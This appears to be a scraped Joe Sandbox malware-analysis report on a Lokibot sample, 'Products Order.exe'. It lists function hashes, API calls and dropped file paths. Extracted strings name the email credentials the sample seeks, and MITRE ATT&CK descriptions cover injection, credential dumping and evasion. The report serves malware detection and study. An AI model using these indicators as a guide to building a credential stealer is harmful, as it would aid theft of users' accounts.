API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

Technology, xrefs: 0040D08D
EmailAddress, xrefs: 0040D074
SmtpPort, xrefs: 0040D0EB
PopPassword, xrefs: 0040D0D0
SmtpServer, xrefs: 0040D0DC
PopServer, xrefs: 0040D099
PopAccount, xrefs: 0040D0B6
PopPort, xrefs: 0040D0A7
SmtpPassword, xrefs: 0040D117
SmtpAccount, xrefs: 0040D0FA

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040549C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58

Function 004029D4 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Products Order.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Products Order.exe.log

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
Products Order.exe

Function 00007FF848F13535 Relevance: 2.0, APIs: 1, Instructions: 462
processCOMMON

Function 00007FF848F13F6D Relevance: 1.7, APIs: 1, Instructions: 214
injectionCOMMON

Function 00007FF848F13BEA Relevance: 1.7, APIs: 1, Instructions: 193
threadCOMMON

Function 00007FF848F142CD Relevance: 1.7, APIs: 1, Instructions: 187
memoryCOMMON

Function 00007FF848F1447D Relevance: 1.6, APIs: 1, Instructions: 141
threadCOMMON

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre